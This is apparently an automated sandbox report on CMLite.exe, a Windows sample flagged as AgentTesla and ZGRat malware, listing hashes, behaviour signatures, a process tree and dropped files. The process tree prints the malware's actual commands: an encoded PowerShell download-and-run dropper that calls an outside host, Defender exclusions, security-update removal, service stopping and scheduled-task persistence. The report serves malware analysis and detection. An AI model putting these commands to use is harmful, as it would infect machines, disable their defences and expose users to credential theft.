Overview

overview

10

Static

static

1

CMLite.exe

windows7-x64

10

CMLite.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    08-05-2024 12:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CMLite.exe

  • Size

    2.3MB

  • MD5

    616a65eb66de1b0218401d55bc36e8b8

  • SHA1

    3c61c3844590cdffe11218fb8f5bb13a5555d52e

  • SHA256

    35bbb997958723a543c906b2c014da4e73d28b935260a58a46c5c09d2920bb89

  • SHA512

    c77ace0d3a8a9dfb5d18e5099b2afef1ad5bc0add6a947fcf1efc8c32be2f8ccab7405bccc8f7514b4f2a884a4c01969e097bf87e724b60effca333628e03004

  • SSDEEP

    49152:C3Iq8lWFDP5E73BgWmU2p77Qqs10y3SryMqf:CMeDPYCWmn5QfbSryMqf

Score
10/10
agentteslazgratevasionexecutionkeyloggerpersistenceratspywarestealertrojan

Malware Config

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Detect ZGRat V1 4 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • AgentTesla payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

    execution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\CMLite.exe
    "C:\Users\Admin\AppData\Local\Temp\CMLite.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2872
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAcwBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABpAGcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBtAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABzAHcAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcALAAgADwAIwBhAHoAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAdgBqACMAPgAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB6AHAAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcAKQApADwAIwBxAGgAbgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AcgBlAG0AbwB0AGUALwBjAG0ASAB5AHAAZQByAHMAdQByAHIAbwBnAGEAdABlAHMAYQB2AGUAcwBEAGgAYwBwAC4AZQB4AGUAJwAsACAAPAAjAGYAbQBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAawBtAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYgBzAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBtAEgAeQBwAGUAcgBzAHUAcgByAG8AZwBhAHQAZQBzAGEAdgBlAHMARABoAGMAcAAuAGUAeABlACcAKQApADwAIwB5AHgAZwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AbQAvAGMAbwBuAGgAbwBzAHQAZwBtAC4AZQB4AGUAJwAsACAAPAAjAGMAcgBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeABzAGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdAB4AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABnAG0ALgBlAHgAZQAnACkAKQA8ACMAeQBqAHAAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBpAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB6AG0AYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcAKQA8ACMAeQBpAGoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBiAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGwAeQBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbQBIAHkAcABlAHIAcwB1AHIAcgBvAGcAYQB0AGUAcwBhAHYAZQBzAEQAaABjAHAALgBlAHgAZQAnACkAPAAjAGcAbQBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAG0AdQBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAHEAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAG8AbgBoAG8AcwB0AGcAbQAuAGUAeABlACcAKQA8ACMAZwB5AHcAIwA+AA=="
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2632
      • C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe
        "C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe"
        3⤵
        • Executes dropped EXE
        • Enumerates system info in registry
        PID:2780
      • C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe
        "C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2916
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\BridgeChainserverwinDriver\lWPzR1COw6cbe1Bc3dVzDZxdAD6Pz4jxoWgNKIOPHWBjqt3tHIP3Cr.vbe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2420
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\BridgeChainserverwinDriver\SQvq6Fq.bat" "
            5⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1512
            • C:\BridgeChainserverwinDriver\cmHypersurrogatesavesDhcp.exe
              "C:\BridgeChainserverwinDriver/cmHypersurrogatesavesDhcp.exe"
              6⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:880
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\BridgeChainserverwinDriver\services.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:996
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Idle.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:908
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\BridgeChainserverwinDriver\wininit.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:900
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\BridgeChainserverwinDriver\lsass.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:1520
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ed850442-d104-11ee-9c57-c695cbc44580\dwm.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:2132
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qju8ggyhS0.bat"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2932
                • C:\Windows\system32\chcp.com
                  chcp 65001
                  8⤵
                    PID:2924
                  • C:\Windows\system32\w32tm.exe
                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    8⤵
                      PID:2612
                    • C:\BridgeChainserverwinDriver\services.exe
                      "C:\BridgeChainserverwinDriver\services.exe"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1672
          • C:\Users\Admin\AppData\Roaming\conhostgm.exe
            "C:\Users\Admin\AppData\Roaming\conhostgm.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2252
            • C:\Users\Admin\AppData\Roaming\.conhostgm.exe
              "C:\Users\Admin\AppData\Roaming\.conhostgm.exe"
              4⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              PID:2512
              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                5⤵
                • Command and Scripting Interpreter: PowerShell
                PID:2324
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2284
                • C:\Windows\system32\wusa.exe
                  wusa /uninstall /kb:890830 /quiet /norestart
                  6⤵
                  • Drops file in Windows directory
                  PID:1064
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop UsoSvc
                5⤵
                • Launches sc.exe
                PID:2068
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                5⤵
                • Launches sc.exe
                PID:928
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop wuauserv
                5⤵
                • Launches sc.exe
                PID:2968
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop bits
                5⤵
                • Launches sc.exe
                PID:1788
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop dosvc
                5⤵
                • Launches sc.exe
                PID:852
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2040
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1364
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2160
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2224
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe delete "driverupdate"
                5⤵
                • Launches sc.exe
                PID:1128
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
                5⤵
                • Launches sc.exe
                PID:2144
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop eventlog
                5⤵
                • Launches sc.exe
                PID:964
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe start "driverupdate"
                5⤵
                • Launches sc.exe
                PID:112
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\BridgeChainserverwinDriver\services.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:852
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\BridgeChainserverwinDriver\services.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2012
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\BridgeChainserverwinDriver\services.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2312
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Idle.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1604
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Idle.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1968
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Idle.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1632
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\BridgeChainserverwinDriver\wininit.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1344
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\BridgeChainserverwinDriver\wininit.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1304
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\BridgeChainserverwinDriver\wininit.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:112
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\BridgeChainserverwinDriver\lsass.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1856
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\BridgeChainserverwinDriver\lsass.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2528
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\BridgeChainserverwinDriver\lsass.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:404
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Recovery\ed850442-d104-11ee-9c57-c695cbc44580\dwm.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2072
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\ed850442-d104-11ee-9c57-c695cbc44580\dwm.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2364
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Recovery\ed850442-d104-11ee-9c57-c695cbc44580\dwm.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2996
      • C:\ProgramData\VC_redist.x64.exe
        C:\ProgramData\VC_redist.x64.exe
        1⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        PID:2788
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:1100
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:808
          • C:\Windows\system32\wusa.exe
            wusa /uninstall /kb:890830 /quiet /norestart
            3⤵
            • Drops file in Windows directory
            PID:2300
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop UsoSvc
          2⤵
          • Launches sc.exe
          PID:604
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop WaaSMedicSvc
          2⤵
          • Launches sc.exe
          PID:1856
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop wuauserv
          2⤵
          • Launches sc.exe
          PID:2072
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop bits
          2⤵
          • Launches sc.exe
          PID:2924
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop dosvc
          2⤵
          • Launches sc.exe
          PID:2996
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2976
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1588
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2248
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2364
        • C:\Windows\system32\conhost.exe
          C:\Windows\system32\conhost.exe
          2⤵
            PID:2768

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\BridgeChainserverwinDriver\SQvq6Fq.bat
          Filesize

          102B

          MD5

          96b489ae2503e2ab4e18a2b584fad475

          SHA1

          873daaaec0a6978a3f6e9a99bf66dfa388ea8321

          SHA256

          6c5ade02c3d706cf54d5d7e0ce525034179ac3f80866caf615e265737df6f1c1

          SHA512

          9ac4ba04e5bc86aced9fbab34b2564bbd59ff249598a4e4501105ee6a443b0467b2995fdeef49cffd84ca106b6256f21a26e243d4396f0a394c2110b7fe54d52

          Download Submit

        • C:\BridgeChainserverwinDriver\lWPzR1COw6cbe1Bc3dVzDZxdAD6Pz4jxoWgNKIOPHWBjqt3tHIP3Cr.vbe
          Filesize

          211B

          MD5

          d4f337599faff375fa8c61471ad7048c

          SHA1

          7bc11cc1588e072698090393875dcf856b874ba1

          SHA256

          10d502ba0315c5fc07e317116ff1dda94b59fe8f6381d75a319a2c7e0891e07a

          SHA512

          6291806cc91e9162a878973b0b02186869fdbb6457fdbf15d6f7b2e538638b3026b66dc5443c8dde0e79d33483aea18e363e711e788c6dab911678bd19a40899

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
          Filesize

          68KB

          MD5

          29f65ba8e88c063813cc50a4ea544e93

          SHA1

          05a7040d5c127e68c25d81cc51271ffb8bef3568

          SHA256

          1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

          SHA512

          e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

          Download Submit

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
          Filesize

          344B

          MD5

          29cda902c88afea5e991ad9fe422e7c6

          SHA1

          26075c55563fb2d3b5eb5336256e22c4d0bc1c3f

          SHA256

          2c3ce30f75ae3af261ee7ce83a56246f266836b96fc340990d2c95741fd4b900

          SHA512

          0e502e62032529509b8034939a50be60e231a6dbff2dc03d982c5a10872b3234b17f09dba672826ba01bb7d3eddade0b33391c17465cdc3a86fb0468b8d4ffcb

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Cab278F.tmp
          Filesize

          65KB

          MD5

          ac05d27423a85adc1622c714f2cb6184

          SHA1

          b0fe2b1abddb97837ea0195be70ab2ff14d43198

          SHA256

          c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

          SHA512

          6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Tar2871.tmp
          Filesize

          177KB

          MD5

          435a9ac180383f9fa094131b173a2f7b

          SHA1

          76944ea657a9db94f9a4bef38f88c46ed4166983

          SHA256

          67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

          SHA512

          1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\qju8ggyhS0.bat
          Filesize

          218B

          MD5

          e6ae9b4f6c392beba334b9de21877664

          SHA1

          210f427c3df7d4fe63990e7009b49bed79592adc

          SHA256

          15afc125ab837860b57d4d0b91417a0e9eafb65dcd58b927b4e57a29559e6222

          SHA512

          e82f42b14861c211980d3ca122d40804fdf6e9c4d933f10ddf25b3f51c7669f021dcdbb8b31955a1bcd31a6b8197efe84f86d04ba5ae512fc1e0a4c62d253018

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          ca9102fff0e1feefa288ff4fd21ecf2a

          SHA1

          1e38043e83399e20728054695faad6f8e529c02e

          SHA256

          cfec127321865aeeee9b80868cb4dd09239ab3260a50e082c142281436a20cc4

          SHA512

          66e58efd069abfa4cce65ed5077ed14d52c9742387707859539f9baf01d0e968abae479303fa3b49cbe87bcf44b813007345bf049b0e1dc946e36cd163a76cd9

          Download Submit

        • C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe
          Filesize

          2.3MB

          MD5

          322944acd00186c743f6ff097c0db0c6

          SHA1

          a330f89db2367088048022b74be3a2cb67853a61

          SHA256

          aed6159dc2a264fd2fb0c0d20d7816c26741e1fcd517b06ed4726a8ff1e32d5a

          SHA512

          bf1a98a40a94ea180c01dd90610ee434fd555592ca2e21078330493cd4f8b1f401ae3a5bdf1c0beb4d2181b135760a66ac2c73881d7611f57ef6ceba4fa3e7e3

          Download Submit

        • \BridgeChainserverwinDriver\cmHypersurrogatesavesDhcp.exe
          Filesize

          2.0MB

          MD5

          2eea3122b5e1a714d45f7718ce3a25e3

          SHA1

          b6d45f1124bf85fd571e6ea9417104b51d539456

          SHA256

          bb8b517b159e137ba92f0ab246630ff36e20fe350056afa75be751fedd634b55

          SHA512

          13c6eedaf9a582d6c02ad478e24a5ae7d66c1195677e8d42541355807336dba09ce736e4539bfe04ce3b98e40aa52c54f457eda6a8b5fd547b784d7c6c89258e

          Download Submit

        • \Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe
          Filesize

          977KB

          MD5

          02ea34533272f916fb52990a45917913

          SHA1

          bd68a7c84b7d7a65ab19419ddf6a2a2b44fda0a4

          SHA256

          6dd45a770648da5f5996ac7b28f604493b44f8b1ba7458cf60d3a1ab7cf18590

          SHA512

          352521214ed922b0e3331559d0c6b2af0fc55e4b4077dcf83dbeec08a8f59820c98bbbd795cdd8e2430c835ba7fbb6b19c34572762c7cf6359de05b99ef019a7

          Download Submit

        • \Users\Admin\AppData\Roaming\conhostgm.exe
          Filesize

          2.9MB

          MD5

          316fa77cc45d0802155448d648b417b4

          SHA1

          c60be59c3df582030f3bbbf7c93e3f6110a38c82

          SHA256

          dd248b4df3e5b9eac86bbe9fc6f7ef17b0d75738b601267b214a825783d0a2a1

          SHA512

          4f1a4b71bc0d18dd6210c7b55736e2c43cf90f7ed700061a775ceecade3ef2b88c0e122769c5570e5bb2b8453deab6d5ff50ab73ff0fbb1cb9b3475be76c4da9

          Download Submit

        • memory/880-123-0x00000000006C0000-0x00000000006DC000-memory.dmp

          Filesize

          112KB

          Download

        • memory/880-133-0x00000000007A0000-0x00000000007AE000-memory.dmp

          Filesize

          56KB

          Download

        • memory/880-135-0x00000000007B0000-0x00000000007BC000-memory.dmp

          Filesize

          48KB

          Download

        • memory/880-119-0x00000000002A0000-0x00000000004A4000-memory.dmp

          Filesize

          2.0MB

          Download

        • memory/880-121-0x0000000000290000-0x000000000029E000-memory.dmp

          Filesize

          56KB

          Download

        • memory/880-131-0x00000000006F0000-0x00000000006FC000-memory.dmp

          Filesize

          48KB

          Download

        • memory/880-125-0x0000000000780000-0x0000000000798000-memory.dmp

          Filesize

          96KB

          Download

        • memory/880-129-0x00000000006B0000-0x00000000006BE000-memory.dmp

          Filesize

          56KB

          Download

        • memory/880-127-0x00000000006A0000-0x00000000006AE000-memory.dmp

          Filesize

          56KB

          Download

        • memory/1100-195-0x0000000000CF0000-0x0000000000CF8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1100-194-0x000000001A020000-0x000000001A302000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/1520-164-0x000000001B490000-0x000000001B772000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/1520-166-0x0000000002980000-0x0000000002988000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1672-179-0x0000000000E40000-0x0000000001044000-memory.dmp

          Filesize

          2.0MB

          Download

